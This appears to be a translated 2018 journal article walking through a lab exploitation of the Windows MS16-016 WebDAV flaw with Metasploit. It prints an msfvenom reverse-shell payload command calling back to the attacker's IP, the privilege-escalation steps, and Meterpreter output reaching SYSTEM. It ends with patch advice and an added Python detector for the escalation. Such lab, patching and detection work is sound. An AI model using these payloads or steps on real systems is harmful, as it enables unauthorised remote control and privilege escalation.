
龙源期刊网 (Longyuan Journals) http://www.qikan.com.cn

Exploiting the MS16-016 Local Overflow Vulnerability with Metasploit: A Hands-On Walkthrough

×÷ÕߣºÕÔÇï

Source: Computer Knowledge and Technology (《电脑知识与技术》), 2018, Issue 31

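Abstract: This paper briefly introduces the MS16-016 local overflow vulnerability, analyzes how the vulnerability is used to penetrate Windows 7 and obtain system privileges, and finally gives the corresponding preventive measures.

Keywords: Metasploit; MS16-016; local overflow vulnerability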

CLC number: TP393    Document code: A    Article ID: 1009-3044(2018)31-0216-01

1 Vulnerability Overview

The MS16-016 vulnerability is caused by WebDAV in Windows incorrectly handling information sent by the WebDAV client. To exploit it, an attacker must first log on to the system. The attacker can then run an application specially crafted to exploit the vulnerability and so take control of the affected system. On the following systems the vulnerability allows elevation to system privileges: Windows Vista SP2, Windows Server 2008 x86 & x64, Windows Server 2008 R2 x64, Windows 7 x86 & x64, Windows 8.1 x86 & x64. On the following systems it causes a denial of service (blue screen): Windows Server 2012, Windows Server 2012 R2, Windows RT 8.1, Windows 10.

2 Exploiting the MS16-016 Local Overflow Vulnerability

This section describes penetrating Windows 7 x86 from Kali. The Kali IP address is 10.3.81.106 and the Windows 7 x86 IP address is 10.3.81.152. Metasploit in the Kali virtual machine is used to exploit the MS16-016 local overflow vulnerability against Windows 7 and obtain system privileges.

1) On Kali, generate the connect-back program msf.exe, with LHOST set to the Kali IP address.

root@kali:~# msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 -b '\x00' LHOST=10.3.81.106 LPORT=4444 -f exe > msf.exe

2) At the command line, enter "msfconsole" to bring up the MSF start-up screen.

root@kali:~# msfconsole

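3) At the Metasploit prompt, load the listener module with the use command. Set the payload to windows/meterpreter/reverse_tcp. Set the local listening host IP address to the Kali IP. The relevant parameters can be viewed with show options; enter the exploit command to start listening.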


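4) Send msf.exe to the Windows 7 machine and run it there. Kali then shows a connection notice, and MSF can be seen to have received session 1 (the session connection). Next, in the Meterpreter shell, use the getuid command to see that the privileges obtained so far are user privileges. We want to raise them to system privileges, the highest privileges on Windows.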

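5) Enter the background command to move the current Metasploit shell to the background. Select the MS16-016 vulnerability to escalate privileges, and set the session ID to that of the connection just established, 1. Finally, run the exploit command to escalate privileges; the output shows that the vulnerability was successfully exploited into the process with PID 2872.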

6) Although the escalation succeeded, running the getuid command in the session with ID 1 still shows user privileges.

msf exploit(windows/local/ms16_016_webdav) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > getuid

Server username: cmx-PC\cmx

7) Use the migrate command to migrate into that process ID.

meterpreter > migrate 2872
[*] Migrating from 4068 to 2872...
[*] Migration completed successfully.

8) Then run the getuid command again to check the privileges; they are now system privileges. Enter shell to test.

meterpreter > getuid

Server username: NT AUTHORITY\SYSTEM
meterpreter > shell
Process 608 created.
Channel 1 created.

Microsoft Windows [版本 6.1.7601]

版权所有 (c) 2009 Microsoft Corporation。保留所有权利。


C:\Users\cmx\Desktop>

3 Defending Against the MS16-016 Local Overflow Vulnerability

You can also obtain this update through Windows Update. Once automatic updating is turned on, the system downloads and installs the update automatically. Users can obtain the standalone update package from https://docs.microsoft.com/zh-cn/security-updates/Securitybulletins/2016/ms16-016. The security update fixes the vulnerability by correcting how WebDAV validates input.
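Steps 5 to 8 leave a recognisable trace for defenders: a process that the user cmx started (PID 2872) becomes the parent of a shell running as NT AUTHORITY\SYSTEM. The Python code below is an added example, not part of the original article, that looks for this parent/child account mismatch in process-creation records. The record format, field names, image names and the premise that a creation record keeps the account the process was started under are assumptions made for illustration.

```python
# Added example: flag SYSTEM processes created under a parent owned by an ordinary user.
# Records are a simplified, constructed stand-in for process-creation telemetry;
# the field names (pid, ppid, image, user) are assumptions, not a real log schema.
SYSTEM = "NT AUTHORITY\\SYSTEM"

# Constructed sample, oldest first. PIDs 4068, 2872, 608 and the account cmx-PC\cmx
# mirror the article's lab session; image names and other PIDs are made up.
SAMPLE_EVENTS = [
    {"pid": 500, "ppid": 400, "image": "services.exe", "user": SYSTEM},
    {"pid": 1200, "ppid": 500, "image": "svchost.exe", "user": SYSTEM},
    {"pid": 3000, "ppid": 1100, "image": "explorer.exe", "user": "cmx-PC\\cmx"},
    {"pid": 4068, "ppid": 3000, "image": "msf.exe", "user": "cmx-PC\\cmx"},
    {"pid": 2872, "ppid": 4068, "image": "host.exe", "user": "cmx-PC\\cmx"},
    {"pid": 608, "ppid": 2872, "image": "cmd.exe", "user": SYSTEM},
]


def lineage(procs, pid, limit=16):
    """Walk parent links upward from pid; stop at unknown parents or loops."""
    chain, seen = [], set()
    while pid in procs and pid not in seen and len(chain) < limit:
        seen.add(pid)
        chain.append(f'{procs[pid]["image"]}({pid})')
        pid = procs[pid]["ppid"]
    return chain


def find_escalations(events):
    """Return one alert per SYSTEM process whose parent ran as another account."""
    procs, alerts = {}, []  # procs: pid -> latest creation record for that pid
    for ev in events:
        parent = procs.get(ev["ppid"])
        if (ev["user"].upper() == SYSTEM.upper() and parent is not None
                and parent["user"].upper() != SYSTEM.upper()):
            alerts.append({
                "pid": ev["pid"],
                "image": ev["image"],
                "parent_user": parent["user"],
                "lineage": lineage(procs, ev["ppid"]),
            })
        procs[ev["pid"]] = ev  # a reused PID overwrites the stale record
    return alerts


if __name__ == "__main__":
    for alert in find_escalations(SAMPLE_EVENTS):
        print(alert["image"], alert["pid"], "<-", " <- ".join(alert["lineage"]))
```

The lineage list gives the analyst the chain back to the first user-owned ancestor, which is the program to collect and the account to review.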
